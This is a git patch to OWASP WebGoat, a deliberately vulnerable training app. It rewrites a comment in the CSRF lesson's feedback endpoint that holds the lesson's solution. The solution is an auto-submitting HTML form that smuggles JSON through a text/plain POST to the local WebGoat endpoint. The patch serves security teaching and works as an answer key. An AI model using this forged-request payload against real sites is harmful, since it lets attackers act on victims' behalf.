From 9c90a24cc06452bda60c259a19862d8b7bf33c3e Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 26 Jan 2025 20:23:40 +0100
Subject: [PATCH] docs(CSRFFeedback.java): fixed one invalid solution about
 CSRF attack (#2010)

Co-authored-by: HackHuang <GoogTech@outlook.com>
Co-authored-by: HackHuang <hi@goog.tech>
---
 .../owasp/webgoat/lessons/csrf/CSRFFeedback.java    | 13 ++++++++-----
 1 file changed, 8 insertions(+), 5 deletions(-)

diff --git a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
index 2154ed34d..bc0cc493a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
@@ -115,10 +115,13 @@ public class CSRFFeedback implements AssignmentEndpoint {
     return false;
   }
 
-  /**
-   * Solution <form name="attack" enctype="text/plain"
-   * action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> <input
-   * type="hidden" name='{"name": "Test", "email": "test1233@dfssdf.de", "subject": "service",
-   * "message":"dsaffd"}'> </form> <script>document.attack.submit();</script>
+  /*
+   * Solution:
+   * <form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST">
+   *    <!-- Construct valid JSON data: {name: "HackHuang", email: "email@example.com", subject: "suggestions", message: "Fixed the invalid solution="} -->
+   *    <input type="hidden" name='{"name": "HackHuang", "email": "email@example.com", "subject": "suggestions","message":"Fixed the invalid solution', value='"}'>
+   * </form>
+   * <script>document.attack.submit();</script>
    */
+
 }